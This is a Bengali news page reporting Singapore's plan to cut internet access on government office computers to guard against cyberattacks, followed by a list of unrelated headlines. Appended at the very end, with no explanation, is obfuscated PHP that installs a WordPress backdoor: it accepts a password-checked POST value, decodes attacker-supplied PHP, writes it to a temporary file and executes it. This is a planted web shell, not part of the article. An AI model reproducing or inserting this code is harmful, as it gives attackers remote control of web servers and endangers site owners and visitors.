শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সিঙ্গাপুরের সরকারি অফিসে নিষিদ্ধ হচ্ছে ইন্টারনেট

1113অনলাইন ডেস্ক : প্রযুক্তিবিশ্বের অন্যতম এক মোড়ল সিঙ্গাপুরের সরকারি কর্মকর্তাদের জন্য অফিসের কম্পিউটারে ইন্টারনেট ব্যবহার নিষিদ্ধ হচ্ছে। নিরাপত্তার স্বার্থে এ উদ্যোগ নিয়েছে দেশটি। নির্দেশনাটি বাস্তবায়ন হবে আগামী বছরের মে মাস থেকে। খবর বিবিসির।

দ্যা স্ট্রেইট টাইমস পত্রিকার খবর দিয়ে বিবিসির প্রতিবেদনে বলা হয়েছে, নিরাপত্তা হুমকির মাঝে কর্মকর্তাদের ইমেইল এবং সরকারি নথিপত্রের গোপণীয়তা রক্ষার জন্যই সরকার এই পদক্ষেপ নিয়েছে।

আগামী বছর থেকে দেশটির কর্মকর্তারা সরকারি ইমেইল থেকে কোনো তথ্য তাদের ব্যক্তিগত ইমেইলে ফরোয়ার্ড করতে পারবেন না বলেও জানানো হয়েছে ওই খবরে।

সরকারি অফিসে ইন্টারনেট সেবা বন্ধের এ খবরে খুব একটা খুশি হতে পারেননি দেশটির নাগরিকেরা। অনলাইনে তারা নানা রকম প্রতিক্রিয়া দেখাচ্ছেন। অনেকে বিষয়টিকে ‘স্মার্ট নেশন টেকনোলজি ইনিশিয়েটিভ’-এর পরিপন্থী বলে মনে করছেন।

সিঙ্গাপুরের তথ্য-প্রযুক্তি নিরাপত্তা প্রতিষ্ঠান আইডিএ বলছে, সম্ভাব্য সাইবার হামলা ঠেকাতে এবং নিরাপদ কর্ম পরিবেশ সৃষ্টির উদ্দেশ্যে এই ব্যবস্থা নেওয়া হয়েছে।

আইডিএ’র একজন মুখপাত্র বিবিসিকে জানিয়েছেন, তারা সরকারি কর্মকর্তাদের জন্য ভিন্ন একটি নেটওয়ার্ক গড়ে তুলছেন, যাতে অধিকতর নিরাপত্তার ব্যবস্থা থাকবে।

২০১৩ সালে ‘অ্যানোনিমাস’ নামে পরিচিত হ্যাকারদের গ্রুপ সিঙ্গাপুরের প্রধানমন্ত্রীর সরকারি ওয়েবসাইট হ্যাক করেছিল। এরপর থেকেই বিষয়টি নিয়ে মাথা ঘামাচ্ছিল দেশটির প্রযুক্তিবিদরা। এরপর বিভিন্ন দেশের ব্যাংক অ্যাকাউন্ট, গুরুত্বপূর্ণ ব্যক্তির ইমেইল হ্যাকের একাধিক ঘটনা সামনে আসায় তারা আরও নড়েচড়ে বসে। অবশেষে সরকারি কর্মকর্তাদের ইন্টারনেটই বন্ধ করে দেওয়ার সিদ্ধান্ত নিলো দেশটি।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}